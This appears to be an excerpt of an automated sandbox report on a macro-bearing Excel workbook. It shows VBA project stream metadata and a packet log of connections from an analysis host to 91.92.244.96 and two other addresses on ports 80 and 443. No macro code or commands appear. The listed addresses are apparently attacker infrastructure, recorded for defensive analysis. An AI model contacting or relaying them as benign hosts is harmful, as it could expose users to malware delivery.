Stream Path:	_VBA_PROJECT_CUR/PROJECT
CLSID:
File Type:	ASCII text, with CRLF line terminators
Stream Size:	521
Entropy:	5.2307408528767505
Base64 Encoded:	True
Data ASCII:	I D = " { 0 6 B C 2 6 F C - 4 4 5 3 - 4 4 F 0 - A 9 2 0 - 8 9 5 D 9 7 7 E 0 D 7 3 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " D 9 D B 1 F A 5 2 3 A 5 2 3 A 5 2
Data Raw:	49 44 3d 22 7b 30 36 42 43 32 36 46 43 2d 34 34 35 33 2d 34 34 46 30 2d 41 39 32 30 2d 38 39 35 44 39 37 37 45 30 44 37 33 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30

Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 104

General
Stream Path:	_VBA_PROJECT_CUR/PROJECTwm
CLSID:
File Type:	data
Stream Size:	104
Entropy:	3.0488640812019017
Base64 Encoded:	False
Data ASCII:	T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
Data Raw:	54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2644

General
Stream Path:	_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
CLSID:
File Type:	data
Stream Size:	2644
Entropy:	3.9875205159166103
Base64 Encoded:	False
Data ASCII:	a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
Data Raw:	cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00

Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 553

General
Stream Path:	_VBA_PROJECT_CUR/VBA/dir
CLSID:
File Type:	data
Stream Size:	553
Entropy:	6.367025276839111
Base64 Encoded:	True
Data ASCII:	. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . l g . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2 E
Data Raw:	01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 fa 6c d6 67 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 13, 2024 15:07:50.061677933 CET	49160	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:50.255697966 CET	80	49160	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:50.256299019 CET	49160	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:50.256541014 CET	49160	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:50.455319881 CET	80	49160	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:50.455337048 CET	80	49160	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:50.455357075 CET	80	49160	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:50.455367088 CET	80	49160	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:50.455379009 CET	80	49160	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:50.455391884 CET	80	49160	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:50.455400944 CET	80	49160	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:50.455409050 CET	80	49160	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:50.455426931 CET	80	49160	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:50.455425978 CET	49160	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:50.455425978 CET	49160	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:50.455437899 CET	80	49160	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:50.455455065 CET	49160	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:50.455455065 CET	49160	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:50.455466986 CET	49160	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:50.462136984 CET	49160	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:50.649225950 CET	80	49160	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:50.649259090 CET	80	49160	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:50.649280071 CET	80	49160	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:50.649293900 CET	49160	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:50.649298906 CET	80	49160	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:50.649315119 CET	80	49160	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:50.649318933 CET	49160	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:50.649318933 CET	49160	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:50.649331093 CET	80	49160	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:50.649347067 CET	80	49160	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:50.649363995 CET	80	49160	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:50.649365902 CET	49160	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:50.649365902 CET	49160	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:50.649373055 CET	49160	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:50.649379969 CET	49160	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:50.649382114 CET	80	49160	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:50.649399996 CET	80	49160	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:50.649411917 CET	49160	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:50.649415016 CET	80	49160	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:50.649420977 CET	49160	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:50.649430990 CET	80	49160	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:50.649440050 CET	49160	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:50.649450064 CET	80	49160	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:50.649456978 CET	49160	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:50.649465084 CET	80	49160	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:50.649471045 CET	49160	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:50.649482012 CET	80	49160	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:50.649494886 CET	49160	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:50.649497986 CET	80	49160	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:50.649511099 CET	49160	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:50.649516106 CET	80	49160	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:50.649524927 CET	49160	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:50.649533987 CET	80	49160	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:50.649544001 CET	49160	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:50.649550915 CET	80	49160	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:50.649559975 CET	49160	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:50.649568081 CET	80	49160	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:50.649571896 CET	49160	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:50.649593115 CET	49160	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:50.649610996 CET	49160	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:50.843235016 CET	80	49160	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:50.843261003 CET	80	49160	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:50.843274117 CET	80	49160	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:50.843288898 CET	80	49160	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:50.843302965 CET	80	49160	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:50.843312979 CET	49160	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:50.843316078 CET	80	49160	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:50.843329906 CET	80	49160	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:50.843344927 CET	49160	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:50.843346119 CET	80	49160	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:50.843344927 CET	49160	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:50.843358040 CET	49160	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:50.843358994 CET	80	49160	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:50.843372107 CET	80	49160	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:50.843384027 CET	49160	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:50.843384027 CET	49160	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:50.843384027 CET	80	49160	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:50.843396902 CET	80	49160	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:50.843398094 CET	49160	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:50.843420982 CET	49160	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:50.843446016 CET	49160	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:50.843460083 CET	80	49160	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:50.843477011 CET	80	49160	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:50.843496084 CET	80	49160	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:50.843503952 CET	80	49160	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:50.843513966 CET	80	49160	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:50.843522072 CET	49160	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:50.843530893 CET	80	49160	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:50.843539953 CET	49160	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:50.843544960 CET	80	49160	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:50.843558073 CET	80	49160	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:50.843563080 CET	49160	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:50.843570948 CET	80	49160	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:50.843575001 CET	49160	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:50.843584061 CET	80	49160	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:50.843596935 CET	80	49160	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:50.843597889 CET	49160	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:50.843605995 CET	49160	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:50.843610048 CET	80	49160	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:50.843622923 CET	80	49160	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:50.843628883 CET	49160	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:50.843635082 CET	49160	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:50.843658924 CET	49160	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:50.843658924 CET	49160	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:50.967859983 CET	49160	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:51.130748987 CET	49161	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:51.324902058 CET	80	49161	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:51.325021982 CET	49161	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:51.325299978 CET	49161	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:51.523401976 CET	80	49161	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:51.523487091 CET	49161	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:51.870207071 CET	49162	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:52.064446926 CET	80	49162	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:52.065134048 CET	49162	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:52.065134048 CET	49162	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:52.262053013 CET	80	49162	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:52.458045006 CET	49162	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:55.483544111 CET	80	49160	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:55.483731031 CET	49160	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:55.668580055 CET	49164	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:55.863075972 CET	80	49164	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:55.863151073 CET	49164	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:55.863343954 CET	49164	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:56.058785915 CET	80	49164	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:56.061444998 CET	49164	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:56.263819933 CET	80	49164	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:56.467144966 CET	49164	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:56.530761003 CET	80	49161	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:56.530821085 CET	49161	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:56.559858084 CET	49164	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:56.754338980 CET	80	49164	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:56.754657030 CET	49164	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:56.950850010 CET	80	49164	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:57.153556108 CET	49164	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:57.280484915 CET	80	49162	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:57.281239033 CET	49162	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:57.281239033 CET	49162	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:57.324940920 CET	49164	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:57.475193024 CET	80	49162	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:57.521250010 CET	80	49164	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:57.521579981 CET	49164	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:57.716953039 CET	80	49164	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:57.933552027 CET	49164	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:58.032474041 CET	49164	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:58.227377892 CET	80	49164	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:58.227669954 CET	49164	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:58.422908068 CET	80	49164	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:58.619954109 CET	49164	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:58.790348053 CET	49164	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:58.984886885 CET	80	49164	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:58.985347033 CET	49164	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:59.180320978 CET	80	49164	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:59.384355068 CET	49164	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:59.500005007 CET	49164	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:59.694778919 CET	80	49164	91.92.244.96	192.168.2.22
Feb 13, 2024 15:07:59.695177078 CET	49164	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:07:59.890594006 CET	80	49164	91.92.244.96	192.168.2.22
Feb 13, 2024 15:08:00.026192904 CET	49161	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:08:00.026504040 CET	49165	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:08:00.102067947 CET	49164	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:08:00.220169067 CET	80	49161	91.92.244.96	192.168.2.22
Feb 13, 2024 15:08:00.220264912 CET	80	49165	91.92.244.96	192.168.2.22
Feb 13, 2024 15:08:00.220334053 CET	49165	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:08:00.220447063 CET	49165	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:08:00.415889025 CET	80	49165	91.92.244.96	192.168.2.22
Feb 13, 2024 15:08:00.415972948 CET	49165	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:08:01.175890923 CET	49166	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:08:01.371162891 CET	80	49166	91.92.244.96	192.168.2.22
Feb 13, 2024 15:08:01.371242046 CET	49166	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:08:01.371797085 CET	49166	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:08:01.568494081 CET	80	49166	91.92.244.96	192.168.2.22
Feb 13, 2024 15:08:01.568563938 CET	49166	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:08:02.213979006 CET	49166	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:08:02.322271109 CET	49167	80	192.168.2.22	104.21.84.67
Feb 13, 2024 15:08:02.440048933 CET	80	49167	104.21.84.67	192.168.2.22
Feb 13, 2024 15:08:02.440155029 CET	49167	80	192.168.2.22	104.21.84.67
Feb 13, 2024 15:08:02.440373898 CET	49167	80	192.168.2.22	104.21.84.67
Feb 13, 2024 15:08:02.557920933 CET	80	49167	104.21.84.67	192.168.2.22
Feb 13, 2024 15:08:02.652829885 CET	80	49167	104.21.84.67	192.168.2.22
Feb 13, 2024 15:08:02.652853012 CET	80	49167	104.21.84.67	192.168.2.22
Feb 13, 2024 15:08:02.652916908 CET	49167	80	192.168.2.22	104.21.84.67
Feb 13, 2024 15:08:02.653143883 CET	49167	80	192.168.2.22	104.21.84.67
Feb 13, 2024 15:08:02.653800011 CET	49168	443	192.168.2.22	104.21.84.67
Feb 13, 2024 15:08:02.653825998 CET	443	49168	104.21.84.67	192.168.2.22
Feb 13, 2024 15:08:02.654072046 CET	49168	443	192.168.2.22	104.21.84.67
Feb 13, 2024 15:08:02.655739069 CET	49168	443	192.168.2.22	104.21.84.67
Feb 13, 2024 15:08:02.655746937 CET	443	49168	104.21.84.67	192.168.2.22
Feb 13, 2024 15:08:02.907414913 CET	443	49168	104.21.84.67	192.168.2.22
Feb 13, 2024 15:08:02.907490015 CET	49168	443	192.168.2.22	104.21.84.67
Feb 13, 2024 15:08:02.912496090 CET	49168	443	192.168.2.22	104.21.84.67
Feb 13, 2024 15:08:02.912508965 CET	443	49168	104.21.84.67	192.168.2.22
Feb 13, 2024 15:08:02.912796974 CET	443	49168	104.21.84.67	192.168.2.22
Feb 13, 2024 15:08:03.077482939 CET	49164	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:08:03.121900082 CET	443	49168	104.21.84.67	192.168.2.22
Feb 13, 2024 15:08:03.122020960 CET	49168	443	192.168.2.22	104.21.84.67
Feb 13, 2024 15:08:03.138989925 CET	49168	443	192.168.2.22	104.21.84.67
Feb 13, 2024 15:08:03.185899019 CET	443	49168	104.21.84.67	192.168.2.22
Feb 13, 2024 15:08:03.274223089 CET	80	49164	91.92.244.96	192.168.2.22
Feb 13, 2024 15:08:03.274499893 CET	49164	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:08:03.393088102 CET	443	49168	104.21.84.67	192.168.2.22
Feb 13, 2024 15:08:03.393141985 CET	443	49168	104.21.84.67	192.168.2.22
Feb 13, 2024 15:08:03.393170118 CET	443	49168	104.21.84.67	192.168.2.22
Feb 13, 2024 15:08:03.393207073 CET	443	49168	104.21.84.67	192.168.2.22
Feb 13, 2024 15:08:03.393222094 CET	49168	443	192.168.2.22	104.21.84.67
Feb 13, 2024 15:08:03.393229008 CET	443	49168	104.21.84.67	192.168.2.22
Feb 13, 2024 15:08:03.393241882 CET	443	49168	104.21.84.67	192.168.2.22
Feb 13, 2024 15:08:03.393635988 CET	49168	443	192.168.2.22	104.21.84.67
Feb 13, 2024 15:08:03.393649101 CET	443	49168	104.21.84.67	192.168.2.22
Feb 13, 2024 15:08:03.420363903 CET	443	49168	104.21.84.67	192.168.2.22
Feb 13, 2024 15:08:03.420394897 CET	443	49168	104.21.84.67	192.168.2.22
Feb 13, 2024 15:08:03.420417070 CET	443	49168	104.21.84.67	192.168.2.22
Feb 13, 2024 15:08:03.420424938 CET	49168	443	192.168.2.22	104.21.84.67
Feb 13, 2024 15:08:03.420442104 CET	443	49168	104.21.84.67	192.168.2.22
Feb 13, 2024 15:08:03.420516968 CET	443	49168	104.21.84.67	192.168.2.22
Feb 13, 2024 15:08:03.420572042 CET	49168	443	192.168.2.22	104.21.84.67
Feb 13, 2024 15:08:03.420892000 CET	49168	443	192.168.2.22	104.21.84.67
Feb 13, 2024 15:08:03.421041965 CET	49168	443	192.168.2.22	104.21.84.67
Feb 13, 2024 15:08:03.421041965 CET	49168	443	192.168.2.22	104.21.84.67
Feb 13, 2024 15:08:03.421056032 CET	443	49168	104.21.84.67	192.168.2.22
Feb 13, 2024 15:08:03.421071053 CET	443	49168	104.21.84.67	192.168.2.22
Feb 13, 2024 15:08:03.475225925 CET	80	49164	91.92.244.96	192.168.2.22
Feb 13, 2024 15:08:03.674390078 CET	49164	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:08:03.824405909 CET	49164	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:08:04.019653082 CET	80	49164	91.92.244.96	192.168.2.22
Feb 13, 2024 15:08:04.019911051 CET	49164	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:08:04.217869043 CET	80	49164	91.92.244.96	192.168.2.22
Feb 13, 2024 15:08:04.423182964 CET	49164	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:08:05.036011934 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:05.036043882 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.036134005 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:05.039901018 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:05.039916039 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.290277004 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.290359974 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:05.295686960 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:05.295700073 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.296005011 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.372085094 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:05.417902946 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.420770884 CET	80	49165	91.92.244.96	192.168.2.22
Feb 13, 2024 15:08:05.421804905 CET	49165	80	192.168.2.22	91.92.244.96
Feb 13, 2024 15:08:05.815814018 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.815866947 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.815910101 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.815946102 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.815948009 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:05.815967083 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.816000938 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:05.816006899 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.816040993 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.816071987 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:05.816076040 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.816436052 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.816471100 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.816476107 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:05.816481113 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.816518068 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:05.816526890 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.816559076 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:05.816564083 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.816596031 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:05.817301989 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.817346096 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.817365885 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:05.817370892 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.817409992 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:05.817413092 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.818064928 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.818108082 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.818140984 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.818147898 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:05.818154097 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.818187952 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:05.818192005 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.819017887 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.819058895 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.819062948 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:05.819070101 CET	443	49169	172.67.215.45	192.168.2.22
